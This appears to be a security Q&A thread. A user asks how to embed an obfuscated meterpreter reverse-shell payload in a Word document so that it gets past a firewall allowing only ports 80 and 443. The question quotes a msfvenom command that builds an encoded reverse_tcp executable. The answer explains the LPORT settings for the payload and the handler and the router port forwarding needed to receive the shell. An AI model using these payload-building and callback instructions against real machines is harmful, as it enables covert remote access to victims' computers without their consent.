2

I am trying to build a payload for inserting as an obfuscated code into a Word document, which will create a listener on the attacked machine and will allow me to execute some commands (not through .exe file as shown in tones of videos)

I am assuming: The attacked machine is behind a firewall, which blocks outgoing traffic except for port 80 and 443. Thus I want traffic of the attacked machine to be forwarded TO those ports, so I could listen and execute.

I am using SET toolkit (in Kali), pick "social-engineering attacks"->powershell attack vectors -> alpha-numeric shell code injector.

It prompts for LHOST, which is my public IP, forwarded to my internal IP (I am behind router).

Then it prompts for LPORT and that's it.

My understanding is LPORT - Local Port, which means port I am going to accept traffic coming FROM the attacked machine. But in this case, HOW can I specify an outgoing port for the ATTACKED machine?

I'd like a meterpreter solution, if possible. I don't care if it's a powershell vector or other, since payload, if I understand correctly only opens for me a possibility to listen and execute commands on the attacked machine.

On a SANS Institute cheatsheet I have found an interesting command:

msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Here it seems like LPORT is introduced into malware file, but in this case it'll be exactly what I need; a port for outgoing traffic from the attacked machine.

schroeder
  • 123,438
  • 55
  • 284
  • 319
Michael
  • 121
  • 1
  • 1
  • 3
  • You've got quite a few misconceptions here, suggesting that you're well out of your depth. Outgoing web traffic doesn't go out via ports 80 and 443, for a start - it goes to ports 80 and 443 on some other box. You need to look at how TCP networking works - start with https://www.bleepingcomputer.com/tutorials/tcp-and-udp-ports-explained/ for a high level overview. – Matthew Aug 16 '17 at 11:19

1 Answers1

1

You are going to have to set LPORT to two different values. LPORT on the payload should be the port you forwarded on the router (the one you can access externally). LPORT on the exploit should be a port that your attacking machine listens on, for example port 4444.

Explanation:

Since a firewall only allows port 80 and 443, you will need to forward either 80 or 443 on your router to port 4444.

For this explanation, we are going to take port 5555 as the port open on the router, and port 4444 as the port listening on the attacking computer. To deal with the firewall, you will need to use port 80 or 443 instead of port 5555.

Since you are doing this attack over the internet, and have port forwarded to your attacking machine, you are able to send data from a computer on a different network to your attacking machine. It looks something like this:

Computer on another network -> Router (port 5555) -> attacking machine (port 4444)

So since the payload is launched from another network, the only way for it to communicate with your attacking computer is on port 5555.

The exploit / handler is running on your attacking machine which is on your own network. Port 4444 is listening for data which has been routed from an external computer, though your router, and to port 4444. For this reason, the LPORT for the exploit / handler is 4444.

Joe
  • 2,734
  • 2
  • 12
  • 22